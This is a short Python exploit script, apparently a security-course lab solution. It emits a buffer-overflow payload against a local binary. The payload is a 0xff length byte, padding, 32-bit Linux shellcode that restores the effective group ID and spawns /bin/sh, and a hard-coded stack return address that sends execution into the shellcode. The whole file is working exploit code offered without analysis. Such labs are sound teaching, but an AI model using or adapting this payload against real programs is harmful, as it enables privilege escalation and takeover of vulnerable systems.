#!/usr/bin/env python3

import sys

# Configure Python to print text strings like byte strings. Don't remove this!
sys.stdout.reconfigure(encoding='latin1')

SHELLCODE = \
    '\x6a\x32\x58\xcd\x80\x89\xc3\x89\xc1\x6a' \
    '\x47\x58\xcd\x80\x31\xc0\x50\x68\x2d\x69' \
    '\x69\x69\x89\xe2\x50\x68\x2b\x6d\x6d\x6d' \
    '\x89\xe1\x50\x68\x2f\x2f\x73\x68\x68\x2f' \
    '\x62\x69\x6e\x89\xe3\x50\x52\x51\x53\x89' \
    '\xe1\x31\xd2\xb0\x0b\xcd\x80'

### YOUR CODE HERE ###

sc_len = len(SHELLCODE)
size = '\xff'
print(size,end='')

msg = '[gotcha]'+' '*(128-sc_len-8-3)
print(msg,end=SHELLCODE+' '*3)

garbage = "abcd"*5
print(garbage,end='')

print('\x44\xdc\xff\xff'+'1234', end=SHELLCODE)

